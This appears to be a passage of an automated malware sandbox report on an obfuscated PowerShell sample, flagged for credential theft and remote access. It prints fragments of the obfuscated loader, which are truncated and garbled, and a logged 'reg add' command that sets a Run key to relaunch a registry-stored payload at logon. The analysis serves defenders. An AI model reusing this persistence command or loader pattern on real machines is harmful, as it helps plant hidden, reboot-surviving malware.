w n elflospam dinf nirel rese(ko$lkhsfe apfoaskt wirec,p,un$ .ebrfchfo r.aae y )';$effray=$carpetless;afsvoret (desperates ' k$ sgudl lo tb faphlc,: uhsualugbab.rus t i=ap(s.tgees,si ts -orpafamottehvi s,$une ,f afrerlsa.nybr)');while (!$hagbut) {afsvoret (desperates 'ma$ypgs lbrogebcaainls,: ubskllaobekbetstryvyafksls t= e$.od fiecls,ideg fea nsucu e snsts') ;afsvoret $coumaphos;afsvoret (desperates 'co[tot lh rt,e,ea ed,ris nmhg f. sts hstr.ie uastdga]s :br:i s clmeeare spar(m.4ch0tr0p.0d.)');afsvoret (desperates 'u $,egs.lhjo eb eainl r: kh aatrgglbafuoltta=de(frt Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "mystery" /t reg_expand_sz /d "%sundhedstjeneste% -windowstyle 1 $uforligneliges155=(gi 'hkcu:\software\rnefolk\').getvalue('noncooperation');%sundhedstjeneste% ($uforligneliges155)" Jump to behavior
Source: powershell.exe, 00000005.00000002.3383686166.0000000008339000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: powershell.exe, 00000005.00000002.3383686166.0000000008339000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager4rg_n
Source: powershell.exe, 00000005.00000002.3383686166.0000000008339000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager+v{]c
Source: powershell.exe, 00000005.00000002.3383686166.0000000008339000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager4UvY]c
Source: powershell.exe, 00000005.00000002.3383686166.0000000008304000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3377683667.0000000007223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3383234275.00000000082A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000005.00000002.3383686166.0000000008304000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3383234275.00000000082A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3383686166.000000000832C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3354236670.0000000002B83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5952, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000005.00000002.3383686166.0000000008304000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3383234275.00000000082A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3383686166.000000000832C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3354236670.0000000002B83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5952, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs